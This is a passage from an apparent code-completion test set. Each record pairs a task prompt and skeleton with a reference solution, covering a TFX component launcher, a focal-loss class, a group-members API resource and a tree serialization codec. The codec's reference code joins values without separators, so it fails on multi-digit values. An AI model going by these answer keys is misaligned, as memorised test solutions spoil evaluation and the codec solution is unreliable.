executor_spec.ExecutorClassSpec)\n<|end_body_0|>\n\n<|body_start_1|>\n executor_class_spec = cast(executor_spec.ExecutorClassSpec, self._component_executor_spec)\n if issubclass(executor_class_spec.executor_class, base_beam_executor.BaseBeamExecutor):\n executor_context = base_beam_executor.BaseBeamExecutor.Context(beam_pipeline_args=self._beam_pipeline_args, tmp_dir=os.path.join(self._pipeline_info.pipeline_root, '.temp', ''), unique_id=str(execution_id))\n else:\n executor_context = base_executor.BaseExecutor.Context(extra_flags=self._beam_pipeline_args, tmp_dir=os.path.join(self._pipeline_info.pipeline_root, '.temp', ''), unique_id=str(execution_id))\n executor = executor_class_spec.executor_class(executor_context)\n executor.Do(copy.deepcopy(input_dict), output_dict, copy.deepcopy(exec_properties))\n<|end_body_1|>\n", "class_docstring": "Responsible for launching a python executor. The executor will be launched in the same process of the rest of the component, i.e. its driver and publisher.", "class_name": "InProcessComponentLauncher", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass InProcessComponentLauncher:\n \"\"\"Responsible for launching a python executor. The executor will be launched in the same process of the rest of the component, i.e. its driver and publisher.\"\"\"\n\n def can_launch(cls, component_executor_spec: executor_spec.ExecutorSpec, component_config: base_component_config.BaseComponentConfig) -> bool:\n \"\"\"Checks if the launcher can launch the executor spec.\"\"\"\n <|body_0|>\n\n def _run_executor(self, execution_id: int, input_dict: Dict[str, List[types.Artifact]], output_dict: Dict[str, List[types.Artifact]], exec_properties: Dict[str, Any]) -> None:\n \"\"\"Execute underlying component implementation.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if component_config:\n return False\n return isinstance(component_executor_spec, executor_spec.ExecutorClassSpec)\n<|end_body_0|>\n\n<|body_start_1|>\n executor_class_spec = cast(executor_spec.ExecutorClassSpec, self._component_executor_spec)\n if issubclass(executor_class_spec.executor_class, base_beam_executor.BaseBeamExecutor):\n executor_context = base_beam_executor.BaseBeamExecutor.Context(beam_pipeline_args=self._beam_pipeline_args, tmp_dir=os.path.join(self._pipeline_info.pipeline_root, '.temp', ''), unique_id=str(execution_id))\n else:\n executor_context = base_executor.BaseExecutor.Context(extra_flags=self._beam_pipeline_args, tmp_dir=os.path.join(self._pipeline_info.pipeline_root, '.temp', ''), unique_id=str(execution_id))\n executor = executor_class_spec.executor_class(executor_context)\n executor.Do(copy.deepcopy(input_dict), output_dict, copy.deepcopy(exec_properties))\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000076", "length_bytes": 3187, "license_type": "permissive", "methods": [{"docstring": "Checks if the launcher can launch the executor spec.", "name": "can_launch", "signature": "def can_launch(cls, component_executor_spec: executor_spec.ExecutorSpec, component_config: base_component_config.BaseComponentConfig) -> bool"}, {"docstring": "Execute underlying component implementation.", "name": "_run_executor", "signature": "def _run_executor(self, execution_id: int, input_dict: Dict[str, List[types.Artifact]], output_dict: Dict[str, List[types.Artifact]], exec_properties: Dict[str, Any]) -> None"}], "n_methods": 2, "prompt": "Implement the Python class `InProcessComponentLauncher` described 
below.\n\nClass description:\nResponsible for launching a python executor. The executor will be launched in the same process of the rest of the component, i.e. its driver and publisher.\n\nMethod signatures and docstrings:\n- def can_launch(cls, component_executor_spec: executor_spec.ExecutorSpec, component_config: base_component_config.BaseComponentConfig) -> bool: Checks if the launcher can launch the executor spec.\n- def _run_executor(self, execution_id: int, input_dict: Dict[str, List[types.Artifact]], output_dict: Dict[str, List[types.Artifact]], exec_properties: Dict[str, Any]) -> None: Execute underlying component implementation.", "prompted_full_text": "Implement the Python class `InProcessComponentLauncher` described below.\n\nClass description:\nResponsible for launching a python executor. The executor will be launched in the same process of the rest of the component, i.e. its driver and publisher.\n\nMethod signatures and docstrings:\n- def can_launch(cls, component_executor_spec: executor_spec.ExecutorSpec, component_config: base_component_config.BaseComponentConfig) -> bool: Checks if the launcher can launch the executor spec.\n- def _run_executor(self, execution_id: int, input_dict: Dict[str, List[types.Artifact]], output_dict: Dict[str, List[types.Artifact]], exec_properties: Dict[str, Any]) -> None: Execute underlying component implementation.\n\n<|skeleton|>\nclass InProcessComponentLauncher:\n \"\"\"Responsible for launching a python executor. The executor will be launched in the same process of the rest of the component, i.e. its driver and publisher.\"\"\"\n\n def can_launch(cls, component_executor_spec: executor_spec.ExecutorSpec, component_config: base_component_config.BaseComponentConfig) -> bool:\n \"\"\"Checks if the launcher can launch the executor spec.\"\"\"\n <|body_0|>\n\n def _run_executor(self, execution_id: int, input_dict: Dict[str, List[types.Artifact]], output_dict: Dict[str, List[types.Artifact]], exec_properties: Dict[str, Any]) -> None:\n \"\"\"Execute underlying component implementation.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if component_config:\n return False\n return isinstance(component_executor_spec, executor_spec.ExecutorClassSpec)\n<|end_body_0|>\n\n<|body_start_1|>\n executor_class_spec = cast(executor_spec.ExecutorClassSpec, self._component_executor_spec)\n if issubclass(executor_class_spec.executor_class, base_beam_executor.BaseBeamExecutor):\n executor_context = base_beam_executor.BaseBeamExecutor.Context(beam_pipeline_args=self._beam_pipeline_args, tmp_dir=os.path.join(self._pipeline_info.pipeline_root, '.temp', ''), unique_id=str(execution_id))\n else:\n executor_context = base_executor.BaseExecutor.Context(extra_flags=self._beam_pipeline_args, tmp_dir=os.path.join(self._pipeline_info.pipeline_root, '.temp', ''), unique_id=str(execution_id))\n executor = executor_class_spec.executor_class(executor_context)\n executor.Do(copy.deepcopy(input_dict), output_dict, copy.deepcopy(exec_properties))\n<|end_body_1|>\n", "revision_id": "1b328504fa08a70388691e4072df76f143631325", "skeleton": "<|skeleton|>\nclass InProcessComponentLauncher:\n \"\"\"Responsible for launching a python executor. The executor will be launched in the same process of the rest of the component, i.e. 
its driver and publisher.\"\"\"\n\n def can_launch(cls, component_executor_spec: executor_spec.ExecutorSpec, component_config: base_component_config.BaseComponentConfig) -> bool:\n \"\"\"Checks if the launcher can launch the executor spec.\"\"\"\n <|body_0|>\n\n def _run_executor(self, execution_id: int, input_dict: Dict[str, List[types.Artifact]], output_dict: Dict[str, List[types.Artifact]], exec_properties: Dict[str, Any]) -> None:\n \"\"\"Execute underlying component implementation.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class InProcessComponentLauncher:\n \"\"\"Responsible for launching a python executor. The executor will be launched in the same process of the rest of the component, i.e. its driver and publisher.\"\"\"\n\n def can_launch(cls, component_executor_spec: executor_spec.ExecutorSpec, component_config: base_component_config.BaseComponentConfig) -> bool:\n \"\"\"Checks if the launcher can launch the executor spec.\"\"\"\n if component_config:\n return False\n return isinstance(component_executor_spec, executor_spec.ExecutorClassSpec)\n\n def _run_executor(self, execution_id: int, input_dict: Dict[str, List[types.Artifact]], output_dict: Dict[str, List[types.Artifact]], exec_properties: Dict[str, Any]) -> None:\n \"\"\"Execute underlying component implementation.\"\"\"\n executor_class_spec = cast(executor_spec.ExecutorClassSpec, self._component_executor_spec)\n if issubclass(executor_class_spec.executor_class, base_beam_executor.BaseBeamExecutor):\n executor_context = base_beam_executor.BaseBeamExecutor.Context(beam_pipeline_args=self._beam_pipeline_args, tmp_dir=os.path.join(self._pipeline_info.pipeline_root, '.temp', ''), unique_id=str(execution_id))\n else:\n executor_context = base_executor.BaseExecutor.Context(extra_flags=self._beam_pipeline_args, tmp_dir=os.path.join(self._pipeline_info.pipeline_root, '.temp', ''), unique_id=str(execution_id))\n executor = executor_class_spec.executor_class(executor_context)\n executor.Do(copy.deepcopy(input_dict), output_dict, copy.deepcopy(exec_properties))\n", "source": "the_stack_v2_python_sparse", "source_path": "tfx/orchestration/launcher/in_process_component_launcher.py", "source_repo": "tensorflow/tfx", "split": "test", "star_events_count": 2116} {"blob_id": "0341adbcc9667e041ccd24776d3d8b1a0d8eb714", "bodies": ["super().__init__(**kwargs)\nself.alpha = alpha\nself.gamma = gamma\nself.label_smoothing = label_smoothing", "normalizer, y_true = y\nalpha = tf.convert_to_tensor(self.alpha, dtype=y_pred.dtype)\ngamma = tf.convert_to_tensor(self.gamma, dtype=y_pred.dtype)\npred_prob = tf.sigmoid(y_pred)\np_t = y_true * pred_prob + (1 - y_true) * (1 - pred_prob)\nalpha_factor = y_true * alpha + (1 - y_true) * (1 - alpha)\nmodulating_factor = (1.0 - p_t) ** gamma\ny_true = y_true * (1.0 - self.label_smoothing) + 0.5 * self.label_smoothing\nce = tf.nn.sigmoid_cross_entropy_with_logits(labels=y_true, logits=y_pred)\nreturn alpha_factor * modulating_factor * ce / normalizer"], "bodies_text": "<|body_start_0|>\n super().__init__(**kwargs)\n self.alpha = alpha\n self.gamma = gamma\n self.label_smoothing = label_smoothing\n<|end_body_0|>\n\n<|body_start_1|>\n normalizer, y_true = y\n alpha = tf.convert_to_tensor(self.alpha, dtype=y_pred.dtype)\n gamma = tf.convert_to_tensor(self.gamma, dtype=y_pred.dtype)\n pred_prob = tf.sigmoid(y_pred)\n p_t = y_true * pred_prob + (1 - y_true) * (1 - pred_prob)\n alpha_factor = y_true * 
alpha + (1 - y_true) * (1 - alpha)\n modulating_factor = (1.0 - p_t) ** gamma\n y_true = y_true * (1.0 - self.label_smoothing) + 0.5 * self.label_smoothing\n ce = tf.nn.sigmoid_cross_entropy_with_logits(labels=y_true, logits=y_pred)\n return alpha_factor * modulating_factor * ce / normalizer\n<|end_body_1|>\n", "class_docstring": "Compute the focal loss between `logits` and the golden `target` values. Focal loss = -(1-pt)^gamma * log(pt) where pt is the probability of being classified to the true class.", "class_name": "FocalLoss", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass FocalLoss:\n \"\"\"Compute the focal loss between `logits` and the golden `target` values. Focal loss = -(1-pt)^gamma * log(pt) where pt is the probability of being classified to the true class.\"\"\"\n\n def __init__(self, alpha, gamma, label_smoothing=0.0, **kwargs):\n \"\"\"Initialize focal loss. Args: alpha: A float32 scalar multiplying alpha to the loss from positive examples and (1-alpha) to the loss from negative examples. gamma: A float32 scalar modulating loss from hard and easy examples. label_smoothing: Float in [0, 1]. If > `0` then smooth the labels. **kwargs: other params.\"\"\"\n <|body_0|>\n\n def call(self, y, y_pred):\n \"\"\"Compute focal loss for y and y_pred. Args: y: A tuple of (normalizer, y_true), where y_true is the target class. y_pred: A float32 tensor [batch, height_in, width_in, num_predictions]. Returns: the focal loss.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(**kwargs)\n self.alpha = alpha\n self.gamma = gamma\n self.label_smoothing = label_smoothing\n<|end_body_0|>\n\n<|body_start_1|>\n normalizer, y_true = y\n alpha = tf.convert_to_tensor(self.alpha, dtype=y_pred.dtype)\n gamma = tf.convert_to_tensor(self.gamma, dtype=y_pred.dtype)\n pred_prob = tf.sigmoid(y_pred)\n p_t = y_true * pred_prob + (1 - y_true) * (1 - pred_prob)\n alpha_factor = y_true * alpha + (1 - y_true) * (1 - alpha)\n modulating_factor = (1.0 - p_t) ** gamma\n y_true = y_true * (1.0 - self.label_smoothing) + 0.5 * self.label_smoothing\n ce = tf.nn.sigmoid_cross_entropy_with_logits(labels=y_true, logits=y_pred)\n return alpha_factor * modulating_factor * ce / normalizer\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000077", "length_bytes": 17443, "license_type": "permissive", "methods": [{"docstring": "Initialize focal loss. Args: alpha: A float32 scalar multiplying alpha to the loss from positive examples and (1-alpha) to the loss from negative examples. gamma: A float32 scalar modulating loss from hard and easy examples. label_smoothing: Float in [0, 1]. If > `0` then smooth the labels. **kwargs: other params.", "name": "__init__", "signature": "def __init__(self, alpha, gamma, label_smoothing=0.0, **kwargs)"}, {"docstring": "Compute focal loss for y and y_pred. Args: y: A tuple of (normalizer, y_true), where y_true is the target class. y_pred: A float32 tensor [batch, height_in, width_in, num_predictions]. Returns: the focal loss.", "name": "call", "signature": "def call(self, y, y_pred)"}], "n_methods": 2, "prompt": "Implement the Python class `FocalLoss` described below.\n\nClass description:\nCompute the focal loss between `logits` and the golden `target` values. 
Focal loss = -(1-pt)^gamma * log(pt) where pt is the probability of being classified to the true class.\n\nMethod signatures and docstrings:\n- def __init__(self, alpha, gamma, label_smoothing=0.0, **kwargs): Initialize focal loss. Args: alpha: A float32 scalar multiplying alpha to the loss from positive examples and (1-alpha) to the loss from negative examples. gamma: A float32 scalar modulating loss from hard and easy examples. label_smoothing: Float in [0, 1]. If > `0` then smooth the labels. **kwargs: other params.\n- def call(self, y, y_pred): Compute focal loss for y and y_pred. Args: y: A tuple of (normalizer, y_true), where y_true is the target class. y_pred: A float32 tensor [batch, height_in, width_in, num_predictions]. Returns: the focal loss.", "prompted_full_text": "Implement the Python class `FocalLoss` described below.\n\nClass description:\nCompute the focal loss between `logits` and the golden `target` values. Focal loss = -(1-pt)^gamma * log(pt) where pt is the probability of being classified to the true class.\n\nMethod signatures and docstrings:\n- def __init__(self, alpha, gamma, label_smoothing=0.0, **kwargs): Initialize focal loss. Args: alpha: A float32 scalar multiplying alpha to the loss from positive examples and (1-alpha) to the loss from negative examples. gamma: A float32 scalar modulating loss from hard and easy examples. label_smoothing: Float in [0, 1]. If > `0` then smooth the labels. **kwargs: other params.\n- def call(self, y, y_pred): Compute focal loss for y and y_pred. Args: y: A tuple of (normalizer, y_true), where y_true is the target class. y_pred: A float32 tensor [batch, height_in, width_in, num_predictions]. Returns: the focal loss.\n\n<|skeleton|>\nclass FocalLoss:\n \"\"\"Compute the focal loss between `logits` and the golden `target` values. Focal loss = -(1-pt)^gamma * log(pt) where pt is the probability of being classified to the true class.\"\"\"\n\n def __init__(self, alpha, gamma, label_smoothing=0.0, **kwargs):\n \"\"\"Initialize focal loss. Args: alpha: A float32 scalar multiplying alpha to the loss from positive examples and (1-alpha) to the loss from negative examples. gamma: A float32 scalar modulating loss from hard and easy examples. label_smoothing: Float in [0, 1]. If > `0` then smooth the labels. **kwargs: other params.\"\"\"\n <|body_0|>\n\n def call(self, y, y_pred):\n \"\"\"Compute focal loss for y and y_pred. Args: y: A tuple of (normalizer, y_true), where y_true is the target class. y_pred: A float32 tensor [batch, height_in, width_in, num_predictions]. 
Returns: the focal loss.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(**kwargs)\n self.alpha = alpha\n self.gamma = gamma\n self.label_smoothing = label_smoothing\n<|end_body_0|>\n\n<|body_start_1|>\n normalizer, y_true = y\n alpha = tf.convert_to_tensor(self.alpha, dtype=y_pred.dtype)\n gamma = tf.convert_to_tensor(self.gamma, dtype=y_pred.dtype)\n pred_prob = tf.sigmoid(y_pred)\n p_t = y_true * pred_prob + (1 - y_true) * (1 - pred_prob)\n alpha_factor = y_true * alpha + (1 - y_true) * (1 - alpha)\n modulating_factor = (1.0 - p_t) ** gamma\n y_true = y_true * (1.0 - self.label_smoothing) + 0.5 * self.label_smoothing\n ce = tf.nn.sigmoid_cross_entropy_with_logits(labels=y_true, logits=y_pred)\n return alpha_factor * modulating_factor * ce / normalizer\n<|end_body_1|>\n", "revision_id": "a5388a45f71a949639b35cc5b990bd130d2d8164", "skeleton": "<|skeleton|>\nclass FocalLoss:\n \"\"\"Compute the focal loss between `logits` and the golden `target` values. Focal loss = -(1-pt)^gamma * log(pt) where pt is the probability of being classified to the true class.\"\"\"\n\n def __init__(self, alpha, gamma, label_smoothing=0.0, **kwargs):\n \"\"\"Initialize focal loss. Args: alpha: A float32 scalar multiplying alpha to the loss from positive examples and (1-alpha) to the loss from negative examples. gamma: A float32 scalar modulating loss from hard and easy examples. label_smoothing: Float in [0, 1]. If > `0` then smooth the labels. **kwargs: other params.\"\"\"\n <|body_0|>\n\n def call(self, y, y_pred):\n \"\"\"Compute focal loss for y and y_pred. Args: y: A tuple of (normalizer, y_true), where y_true is the target class. y_pred: A float32 tensor [batch, height_in, width_in, num_predictions]. Returns: the focal loss.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class FocalLoss:\n \"\"\"Compute the focal loss between `logits` and the golden `target` values. Focal loss = -(1-pt)^gamma * log(pt) where pt is the probability of being classified to the true class.\"\"\"\n\n def __init__(self, alpha, gamma, label_smoothing=0.0, **kwargs):\n \"\"\"Initialize focal loss. Args: alpha: A float32 scalar multiplying alpha to the loss from positive examples and (1-alpha) to the loss from negative examples. gamma: A float32 scalar modulating loss from hard and easy examples. label_smoothing: Float in [0, 1]. If > `0` then smooth the labels. **kwargs: other params.\"\"\"\n super().__init__(**kwargs)\n self.alpha = alpha\n self.gamma = gamma\n self.label_smoothing = label_smoothing\n\n def call(self, y, y_pred):\n \"\"\"Compute focal loss for y and y_pred. Args: y: A tuple of (normalizer, y_true), where y_true is the target class. y_pred: A float32 tensor [batch, height_in, width_in, num_predictions]. 
Returns: the focal loss.\"\"\"\n        normalizer, y_true = y\n        alpha = tf.convert_to_tensor(self.alpha, dtype=y_pred.dtype)\n        gamma = tf.convert_to_tensor(self.gamma, dtype=y_pred.dtype)\n        pred_prob = tf.sigmoid(y_pred)\n        p_t = y_true * pred_prob + (1 - y_true) * (1 - pred_prob)\n        alpha_factor = y_true * alpha + (1 - y_true) * (1 - alpha)\n        modulating_factor = (1.0 - p_t) ** gamma\n        y_true = y_true * (1.0 - self.label_smoothing) + 0.5 * self.label_smoothing\n        ce = tf.nn.sigmoid_cross_entropy_with_logits(labels=y_true, logits=y_pred)\n        return alpha_factor * modulating_factor * ce / normalizer\n", "source": "the_stack_v2_python_sparse", "source_path": "TensorFlow2/Detection/Efficientdet/utils/train_lib.py", "source_repo": "NVIDIA/DeepLearningExamples", "split": "test", "star_events_count": 11838} {"blob_id": "a8904f2c319ee5ca143ec31fb7a53c891df28290", "bodies": ["result = {'result': 'NG'}\nctrl_obj = CtrlGroup()\ncontent = ctrl_obj.get_group_members(group_id)\nif content:\n    result['result'] = 'OK'\n    result['content'] = content\nreturn result", "json_data = request.get_json(force=True)\nctrl_obj = CtrlGroup()\nresult = {'result': 'NG', 'error': ''}\ntry:\n    ctrl_obj.add_group_members(json_data)\n    result['result'] = 'OK'\nexcept Exception as e:\n    current_app.logger.error('%s' % str(e))\n    result['error'] = str(e)\nreturn result", "json_data = request.get_json(force=True)\nctrl_obj = CtrlGroup()\nresult = {'result': 'NG', 'error': ''}\ntry:\n    ctrl_obj.update_member_role(json_data)\n    result['result'] = 'OK'\nexcept Exception as e:\n    current_app.logger.error('%s' % str(e))\n    result['error'] = str(e)\nreturn result", "ctrl_obj = CtrlGroup()\nresult = {'result': 'NG', 'error': ''}\ntry:\n    ctrl_obj.delete_member(group_id, user_id)\n    result['result'] = 'OK'\nexcept Exception as e:\n    current_app.logger.error('%s' % str(e))\n    result['error'] = str(e)\nreturn result"], "bodies_text": "<|body_start_0|>\n    result = {'result': 'NG'}\n    ctrl_obj = CtrlGroup()\n    content = ctrl_obj.get_group_members(group_id)\n    if content:\n        result['result'] = 'OK'\n        result['content'] = content\n    return result\n<|end_body_0|>\n\n<|body_start_1|>\n    json_data = request.get_json(force=True)\n    ctrl_obj = CtrlGroup()\n    result = {'result': 'NG', 'error': ''}\n    try:\n        ctrl_obj.add_group_members(json_data)\n        result['result'] = 'OK'\n    except Exception as e:\n        current_app.logger.error('%s' % str(e))\n        result['error'] = str(e)\n    return result\n<|end_body_1|>\n\n<|body_start_2|>\n    json_data = request.get_json(force=True)\n    ctrl_obj = CtrlGroup()\n    result = {'result': 'NG', 'error': ''}\n    try:\n        ctrl_obj.update_member_role(json_data)\n        result['result'] = 'OK'\n    except Exception as e:\n        current_app.logger.error('%s' % str(e))\n        result['error'] = str(e)\n    return result\n<|end_body_2|>\n\n<|body_start_3|>\n    ctrl_obj = CtrlGroup()\n    result = {'result': 'NG', 'error': ''}\n    try:\n        ctrl_obj.delete_member(group_id, user_id)\n        result['result'] = 'OK'\n    except Exception as e:\n        current_app.logger.error('%s' % str(e))\n        result['error'] = str(e)\n    return result\n<|end_body_3|>\n", "class_docstring": "", "class_name": "ApiGroupMembers", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ApiGroupMembers:\n\n    def get(self, group_id=None):\n        \"\"\"Get group member information :param group_id: :return:\"\"\"\n        <|body_0|>\n\n    def post(self):\n        \"\"\"Add group members :return:\"\"\"\n        <|body_1|>\n\n    def put(self):\n        \"\"\"Edit group member roles :return:\"\"\"\n        <|body_2|>\n\n    def delete(self, group_id, user_id):\n        \"\"\"Delete a group member :param group_id: :param 
user_id: :return:\"\"\"\n        <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n    result = {'result': 'NG'}\n    ctrl_obj = CtrlGroup()\n    content = ctrl_obj.get_group_members(group_id)\n    if content:\n        result['result'] = 'OK'\n        result['content'] = content\n    return result\n<|end_body_0|>\n\n<|body_start_1|>\n    json_data = request.get_json(force=True)\n    ctrl_obj = CtrlGroup()\n    result = {'result': 'NG', 'error': ''}\n    try:\n        ctrl_obj.add_group_members(json_data)\n        result['result'] = 'OK'\n    except Exception as e:\n        current_app.logger.error('%s' % str(e))\n        result['error'] = str(e)\n    return result\n<|end_body_1|>\n\n<|body_start_2|>\n    json_data = request.get_json(force=True)\n    ctrl_obj = CtrlGroup()\n    result = {'result': 'NG', 'error': ''}\n    try:\n        ctrl_obj.update_member_role(json_data)\n        result['result'] = 'OK'\n    except Exception as e:\n        current_app.logger.error('%s' % str(e))\n        result['error'] = str(e)\n    return result\n<|end_body_2|>\n\n<|body_start_3|>\n    ctrl_obj = CtrlGroup()\n    result = {'result': 'NG', 'error': ''}\n    try:\n        ctrl_obj.delete_member(group_id, user_id)\n        result['result'] = 'OK'\n    except Exception as e:\n        current_app.logger.error('%s' % str(e))\n        result['error'] = str(e)\n    return result\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000078", "length_bytes": 5041, "license_type": "no_license", "methods": [{"docstring": "Get group member information :param group_id: :return:", "name": "get", "signature": "def get(self, group_id=None)"}, {"docstring": "Add group members :return:", "name": "post", "signature": "def post(self)"}, {"docstring": "Edit group member roles :return:", "name": "put", "signature": "def put(self)"}, {"docstring": "Delete a group member :param group_id: :param user_id: :return:", "name": "delete", "signature": "def delete(self, group_id, user_id)"}], "n_methods": 4, "prompt": "Implement the Python class `ApiGroupMembers` described below.\n\nClass description:\nImplement the ApiGroupMembers class.\n\nMethod signatures and docstrings:\n- def get(self, group_id=None): Get group member information :param group_id: :return:\n- def post(self): Add group members :return:\n- def put(self): Edit group member roles :return:\n- def delete(self, group_id, user_id): Delete a group member :param group_id: :param user_id: :return:", "prompted_full_text": "Implement the Python class `ApiGroupMembers` described below.\n\nClass description:\nImplement the ApiGroupMembers class.\n\nMethod signatures and docstrings:\n- def get(self, group_id=None): Get group member information :param group_id: :return:\n- def post(self): Add group members :return:\n- def put(self): Edit group member roles :return:\n- def delete(self, group_id, user_id): Delete a group member :param group_id: :param user_id: :return:\n\n<|skeleton|>\nclass ApiGroupMembers:\n\n    def get(self, group_id=None):\n        \"\"\"Get group member information :param group_id: :return:\"\"\"\n        <|body_0|>\n\n    def post(self):\n        \"\"\"Add group members :return:\"\"\"\n        <|body_1|>\n\n    def put(self):\n        \"\"\"Edit group member roles :return:\"\"\"\n        <|body_2|>\n\n    def delete(self, group_id, user_id):\n        \"\"\"Delete a group member :param group_id: :param user_id: :return:\"\"\"\n        <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n    result = {'result': 'NG'}\n    ctrl_obj = CtrlGroup()\n    content = ctrl_obj.get_group_members(group_id)\n    if content:\n        result['result'] = 'OK'\n        result['content'] = content\n    return result\n<|end_body_0|>\n\n<|body_start_1|>\n    json_data = request.get_json(force=True)\n    ctrl_obj = CtrlGroup()\n    result = {'result': 'NG', 'error': ''}\n    try:\n        ctrl_obj.add_group_members(json_data)\n        result['result'] = 'OK'\n    except Exception as e:\n        current_app.logger.error('%s' % str(e))\n        result['error'] = str(e)\n    return result\n<|end_body_1|>\n\n<|body_start_2|>\n    json_data = 
request.get_json(force=True)\n    ctrl_obj = CtrlGroup()\n    result = {'result': 'NG', 'error': ''}\n    try:\n        ctrl_obj.update_member_role(json_data)\n        result['result'] = 'OK'\n    except Exception as e:\n        current_app.logger.error('%s' % str(e))\n        result['error'] = str(e)\n    return result\n<|end_body_2|>\n\n<|body_start_3|>\n    ctrl_obj = CtrlGroup()\n    result = {'result': 'NG', 'error': ''}\n    try:\n        ctrl_obj.delete_member(group_id, user_id)\n        result['result'] = 'OK'\n    except Exception as e:\n        current_app.logger.error('%s' % str(e))\n        result['error'] = str(e)\n    return result\n<|end_body_3|>\n", "revision_id": "64b31e7bdfcb8a4c95f0a8a607f0bcff576cec11", "skeleton": "<|skeleton|>\nclass ApiGroupMembers:\n\n    def get(self, group_id=None):\n        \"\"\"Get group member information :param group_id: :return:\"\"\"\n        <|body_0|>\n\n    def post(self):\n        \"\"\"Add group members :return:\"\"\"\n        <|body_1|>\n\n    def put(self):\n        \"\"\"Edit group member roles :return:\"\"\"\n        <|body_2|>\n\n    def delete(self, group_id, user_id):\n        \"\"\"Delete a group member :param group_id: :param user_id: :return:\"\"\"\n        <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ApiGroupMembers:\n    def get(self, group_id=None):\n        \"\"\"Get group member information :param group_id: :return:\"\"\"\n        result = {'result': 'NG'}\n        ctrl_obj = CtrlGroup()\n        content = ctrl_obj.get_group_members(group_id)\n        if content:\n            result['result'] = 'OK'\n            result['content'] = content\n        return result\n\n    def post(self):\n        \"\"\"Add group members :return:\"\"\"\n        json_data = request.get_json(force=True)\n        ctrl_obj = CtrlGroup()\n        result = {'result': 'NG', 'error': ''}\n        try:\n            ctrl_obj.add_group_members(json_data)\n            result['result'] = 'OK'\n        except Exception as e:\n            current_app.logger.error('%s' % str(e))\n            result['error'] = str(e)\n        return result\n\n    def put(self):\n        \"\"\"Edit group member roles :return:\"\"\"\n        json_data = request.get_json(force=True)\n        ctrl_obj = CtrlGroup()\n        result = {'result': 'NG', 'error': ''}\n        try:\n            ctrl_obj.update_member_role(json_data)\n            result['result'] = 'OK'\n        except Exception as e:\n            current_app.logger.error('%s' % str(e))\n            result['error'] = str(e)\n        return result\n\n    def delete(self, group_id, user_id):\n        \"\"\"Delete a group member :param group_id: :param user_id: :return:\"\"\"\n        ctrl_obj = CtrlGroup()\n        result = {'result': 'NG', 'error': ''}\n        try:\n            ctrl_obj.delete_member(group_id, user_id)\n            result['result'] = 'OK'\n        except Exception as e:\n            current_app.logger.error('%s' % str(e))\n            result['error'] = str(e)\n        return result\n", "source": "the_stack_v2_python_sparse", "source_path": "Source/collaboration_2/app/api_1_0/api_group_members.py", "source_repo": "lsn1183/web_project", "split": "test", "star_events_count": 0} {"blob_id": "397712fb8f2369fc535f77090b6f6264002cb1f0", "bodies": ["def inorderSerialize(node):\n    if not node:\n        return ''\n    return inorderSerialize(node.left) + str(node.val) + inorderSerialize(node.right)\n\ndef preorderSerialize(node):\n    if not node:\n        return ''\n    return str(node.val) + preorderSerialize(node.left) + preorderSerialize(node.right)\ns1 = s2 = root\nreturn inorderSerialize(s1) + '/' + preorderSerialize(s2)", "def constructTree(inorderList, preorderList):\n    if not inorderList:\n        return None\n    r_val = preorderList.pop(0)\n    r_index = inorderList.index(r_val)\n    root = TreeNode(r_val)\n    root.left = constructTree(inorderList[:r_index], preorderList)\n    root.right = constructTree(inorderList[r_index + 1:], preorderList)\n    return root\ninorder, preorder = tuple(data.split('/'))\nreturn constructTree([int(s) for s in inorder], 
[int(s) for s in preorder])"], "bodies_text": "<|body_start_0|>\n def inorderSerialize(node):\n if not node:\n return ''\n return inorderSerialize(node.left) + str(node.val) + inorderSerialize(node.right)\n\n def preorderSerialize(node):\n if not node:\n return ''\n return str(node.val) + preorderSerialize(node.left) + preorderSerialize(node.right)\n s1 = s2 = root\n return inorderSerialize(s1) + '/' + preorderSerialize(s2)\n<|end_body_0|>\n\n<|body_start_1|>\n def constructTree(inorderList, preorderList):\n if not inorderList:\n return None\n r_val = preorderList.pop(0)\n r_index = inorderList.index(r_val)\n root = TreeNode(r_val)\n root.left = constructTree(inorderList[:r_index], preorderList)\n root.right = constructTree(inorderList[r_index + 1:], preorderList)\n return root\n inorder, preorder = tuple(data.split('/'))\n return constructTree([int(s) for s in inorder], [int(s) for s in preorder])\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Codec", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Codec:\n\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. :type root: TreeNode :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: TreeNode\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n def inorderSerialize(node):\n if not node:\n return ''\n return inorderSerialize(node.left) + str(node.val) + inorderSerialize(node.right)\n\n def preorderSerialize(node):\n if not node:\n return ''\n return str(node.val) + preorderSerialize(node.left) + preorderSerialize(node.right)\n s1 = s2 = root\n return inorderSerialize(s1) + '/' + preorderSerialize(s2)\n<|end_body_0|>\n\n<|body_start_1|>\n def constructTree(inorderList, preorderList):\n if not inorderList:\n return None\n r_val = preorderList.pop(0)\n r_index = inorderList.index(r_val)\n root = TreeNode(r_val)\n root.left = 